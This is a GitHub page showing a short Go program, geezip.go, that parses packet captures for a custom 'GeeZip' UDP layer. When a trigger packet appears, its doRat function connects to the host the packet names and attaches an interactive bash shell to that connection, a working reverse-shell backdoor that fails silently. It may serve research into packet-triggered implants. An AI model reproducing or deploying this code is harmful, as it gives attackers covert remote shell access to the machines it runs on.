-
Notifications
You must be signed in to change notification settings - Fork 0
/
geezip.go
63 lines (49 loc) · 1.22 KB
/
geezip.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
package main
import (
"encoding/hex"
"log"
"net"
"os"
"os/exec"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcap"
)
var end chan int
func doRat(trigger []byte, host string) {
conn, err := net.Dial("tcp", host)
if err != nil {
return // fail silently
}
defer conn.Close()
conn.Write([]byte("Received trigger packet with key=" + hex.EncodeToString(trigger) + ", spawning a shell...\n"))
cmd := exec.Command("/bin/bash", "-i")
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Run()
}
func handlePacket(pkt gopacket.Packet) {
if t := pkt.TransportLayer(); t != nil && t.LayerType() == layers.LayerTypeUDP {
if p := gopacket.NewPacket(t.LayerPayload(), GeeZipLayerType, gopacket.Lazy); p != nil {
l := p.Layer(GeeZipLayerType)
doRat(l.(GeeZipLayer).TriggerFlag, l.(GeeZipLayer).CBString)
}
}
}
func main() {
end = make(chan int, 1)
if len(os.Args) != 2 {
log.Fatalf("Usage: %s <filename>\n", os.Args[0])
}
handle, err := pcap.OpenOffline(os.Args[1])
if err != nil {
panic(err)
}
packetSource := gopacket.NewPacketSource(handle, handle.LinkType())
for packet := range packetSource.Packets() {
handlePacket(packet)
}
<-end
return
}